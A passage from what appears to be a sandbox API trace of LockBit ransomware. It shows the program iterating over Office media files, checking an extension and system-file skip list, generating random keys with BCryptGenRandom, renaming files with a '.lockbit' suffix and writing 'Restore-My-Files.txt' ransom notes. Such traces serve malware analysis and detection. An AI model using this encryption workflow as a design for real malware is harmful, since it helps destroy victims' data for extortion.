(FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0209.765] malloc (_Size=0x40068) returned 0x3f70048 [0209.765] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=917) returned 1 [0209.765] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.765] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.765] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0209.765] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.766] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.766] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0209.766] ReadFile (in: hFile=0xec, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0209.894] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21323_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21323_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.895] malloc (_Size=0xae) returned 0x1fa2ed8 [0209.895] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0209.897] free (_Block=0x1fa2ed8) [0209.897] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21323_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0209.897] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0209.897] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0209.897] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30576c00, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcda2ae0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x30576c00, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0x395, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21324_.GIF", cAlternateFileName="")) returned 1 [0209.897] lstrcmpiW (lpString1=".", lpString2="BD21324_.GIF") returned -1 [0209.897] lstrcmpiW (lpString1="..", lpString2="BD21324_.GIF") returned -1 [0209.897] PathFindExtensionW (pszPath="BD21324_.GIF") returned=".GIF" [0209.897] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0209.897] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0209.897] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0209.897] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0209.897] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0209.897] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0209.897] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0209.897] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0209.897] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0209.897] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0209.897] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0209.898] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0209.898] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0209.898] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0209.898] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0209.898] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0209.898] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0209.898] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0209.898] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0209.898] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0209.898] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0209.898] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0209.898] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0209.898] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0209.898] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.898] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0209.898] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0209.898] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0209.898] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0209.898] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0209.898] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0209.898] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0209.898] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0209.898] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0209.898] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0209.899] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0209.899] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0209.899] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0209.899] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0209.899] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0209.899] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0209.899] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0209.899] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.899] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0209.899] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0209.899] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0209.899] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0209.899] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21324_.GIF") returned 1 [0209.899] lstrcmpiW (lpString1="ntldr", lpString2="BD21324_.GIF") returned 1 [0209.899] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21324_.GIF") returned 1 [0209.899] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21324_.GIF") returned 1 [0209.899] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21324_.GIF") returned -1 [0209.899] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21324_.GIF") returned 1 [0209.899] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21324_.GIF") returned 1 [0209.899] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0209.899] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21324_.GIF") returned=".GIF" [0209.899] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.899] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.899] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0209.900] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0209.900] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0209.900] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0209.900] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0209.900] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0209.900] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0209.900] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.900] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0209.900] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0209.900] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0209.900] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0209.900] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0209.900] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0209.900] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0209.900] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0209.900] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0209.900] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0209.900] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0209.900] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0209.900] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0209.900] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0209.900] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0209.900] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0209.900] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0209.901] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0209.901] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21324_.GIF.lockbit") returned 76 [0209.901] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21324_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21324_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0209.902] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0209.902] malloc (_Size=0x40068) returned 0x3df0008 [0209.902] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=917) returned 1 [0209.902] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.903] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0209.903] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.904] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0209.904] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0209.922] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21324_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21324_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.922] malloc (_Size=0xae) returned 0x1fa2ed8 [0209.922] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0209.927] free (_Block=0x1fa2ed8) [0209.927] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21324_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0209.927] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0209.927] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0209.928] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2df51200, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcda2ae0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x2df51200, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0x5e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21325_.GIF", cAlternateFileName="")) returned 1 [0209.928] lstrcmpiW (lpString1=".", lpString2="BD21325_.GIF") returned -1 [0209.928] lstrcmpiW (lpString1="..", lpString2="BD21325_.GIF") returned -1 [0209.928] PathFindExtensionW (pszPath="BD21325_.GIF") returned=".GIF" [0209.928] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0209.928] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0209.928] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0209.928] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0209.928] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0209.928] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0209.928] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0209.928] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0209.928] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0209.928] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0209.928] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0209.928] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0209.928] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0209.928] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0209.928] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0209.928] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0209.928] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0209.929] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0209.929] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0209.929] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0209.929] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0209.929] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0209.929] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0209.929] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0209.929] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.929] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0209.929] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0209.929] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0209.929] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0209.929] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0209.929] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0209.929] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0209.929] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0209.929] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0209.929] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0209.929] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0209.929] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0209.929] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0209.929] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0209.929] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0209.929] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0209.930] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0209.930] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.930] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0209.930] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0209.930] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0209.930] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0209.930] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21325_.GIF") returned 1 [0209.930] lstrcmpiW (lpString1="ntldr", lpString2="BD21325_.GIF") returned 1 [0209.930] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21325_.GIF") returned 1 [0209.930] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21325_.GIF") returned 1 [0209.930] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21325_.GIF") returned -1 [0209.930] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21325_.GIF") returned 1 [0209.930] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21325_.GIF") returned 1 [0209.930] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0209.930] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21325_.GIF") returned=".GIF" [0209.930] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.930] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.930] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0209.930] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0209.930] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0209.930] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0209.930] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0209.931] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0209.931] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0209.931] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.931] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0209.931] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0209.931] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0209.931] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0209.931] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0209.931] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0209.931] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0209.931] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0209.931] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0209.931] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0209.931] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0209.931] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0209.931] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0209.931] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0209.931] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0209.931] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0209.931] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0209.931] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0209.931] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21325_.GIF.lockbit") returned 76 [0209.931] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21325_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21325_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0209.933] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0209.933] malloc (_Size=0x40068) returned 0x1ff1e60 [0209.933] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1504) returned 1 [0209.933] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.934] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.934] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0209.934] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.934] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.934] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0209.934] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0209.936] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21325_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21325_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.936] malloc (_Size=0xae) returned 0x1fa2ed8 [0209.936] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0209.938] free (_Block=0x1fa2ed8) [0209.938] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21325_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0209.938] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0209.938] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0209.938] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1dae8400, ftCreationTime.dwHighDateTime=0x1bd4f56, ftLastAccessTime.dwLowDateTime=0xbcda2ae0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x1dae8400, ftLastWriteTime.dwHighDateTime=0x1bd4f56, nFileSizeHigh=0x0, nFileSizeLow=0x6f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21326_.GIF", cAlternateFileName="")) returned 1 [0209.938] lstrcmpiW (lpString1=".", lpString2="BD21326_.GIF") returned -1 [0209.938] lstrcmpiW (lpString1="..", lpString2="BD21326_.GIF") returned -1 [0209.938] PathFindExtensionW (pszPath="BD21326_.GIF") returned=".GIF" [0209.938] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0209.938] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0209.939] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0209.939] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0209.939] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0209.939] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0209.939] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0209.939] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0209.939] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0209.939] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0209.939] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0209.939] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0209.939] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0209.939] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0209.939] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0209.939] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0209.939] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0209.939] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0209.939] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0209.939] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0209.939] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0209.939] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0209.939] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0209.940] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0209.940] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.940] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0209.940] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0209.940] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0209.940] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0209.940] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0209.940] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0209.940] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0209.940] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0209.940] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0209.940] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0209.940] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0209.940] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0209.940] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0209.940] lstrcmpiW 